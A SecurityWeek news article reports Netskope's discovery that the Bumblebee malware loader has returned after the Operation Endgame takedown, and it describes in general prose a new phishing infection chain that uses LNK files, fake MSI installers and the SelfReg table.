CONFERENCE Now Live: CISO Forum Virtual Summit - Join Event In-Progress
Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Malware & Threats

Bumblebee Malware Loader Resurfaces Following Law Enforcement Takedown

New malicious campaign suggests the Bumblebee malware loader might be resurfacing following the May 2024 law enforcement takedown.

The sophisticated malware loader Bumblebee appears to have resurfaced after a May 2024 law enforcement operation disrupted its infrastructure, cybersecurity firm Netskope reports.

The takedown, referred to as Operation Endgame, targeted Bumblebee, IcedID, Pikabot, Smokeloader, SystemBC, and Trickbot, and resulted in asset freezes, infrastructure shut down, and the identities of eight suspects made public.

First discovered in March 2022 and mainly used for payload delivery, Bumblebee disappeared from the threat landscape after the disruption, but Netskope has uncovered a new infection chain that results in the loader’s deployment.

The malware downloader appears to be distributed via phishing emails luring the recipients into opening an attached ZIP archive and executing its content.

“The ZIP file contains an LNK file named ‘Report-41952.lnk’ that, once executed, starts a chain of events to download and execute the final Bumblebee payload in memory, avoiding the need to write the DLL on disk, as observed in previous campaigns,” Netskope explains.

Bumblebee’s operators are known for their use of LNK files for payload download and file execution and the newly observed attacks are no different: the LNK file executes a Powershell command to fetch a MSI file from a remote server and install it using msiexec.exe.

User interaction is only required for running the LNK file, while the rest of the infection chain is executed automatically. The MSI files dropping the Bumblebee payload pose as Nvidia and Midjourney installers.

While previous attacks relied on legitimate binaries such as rundll32.exe and regsvr32.exe for loading malicious DLL files, the newly observed Bumblebee infection chain uses a stealthier technique, employing the SelfReg table for DLL execution.

Advertisement. Scroll to continue reading.

“The mentioned DLL is present in an CAB file named ‘disk1’ and once the MSI installation starts, the DLL is loaded in the msiexec process address space and its DllRegisterServer export function is called, leading to the unpacking and execution of the Bumblebee payload,” Netskope explains.

The deployed loader version has the same internal DLL and exported functions as previously observed iterations, as well as the same configuration extraction approach, using a clear-text hardcoded key to decrypt the encrypted configuration.

Related: Stealthy ‘Perfctl’ Malware Infects Thousands of Linux Servers

Related: Diversifying Defenses: FjordPhantom Malware Shows Importance of a Multi-Pronged Approach

Related: Evasive ‘DarkTortilla’ Crypter Delivers RATs, Targeted Malware

Related: FontOnLake Linux Malware Used in Targeted Attacks

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join SecurityWeek and Hitachi Vantara for this this webinar to gain valuable insights and actionable steps to enhance your organization's data security and resilience.

Register

Event: ICS Cybersecurity Conference

The leading industrial cybersecurity conference for Operations, Control Systems and IT/OT Security professionals to connect on SCADA, DCS PLC and field controller cybersecurity.

Register

People on the Move

Secure enterprise browser provider Menlo Security has appointed Bill Robbins as President.

Erik Rolf has joined Booz Allen Hamilton as the Business Information Security Officer (BISO) of Commercial Sector.

Gant Redmon has joined Trustle as its new Chief Executive Officer and Board Director.

More People On The Move

Expert Insights

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest cybersecurity news, threats, and expert insights. Unsubscribe at any time.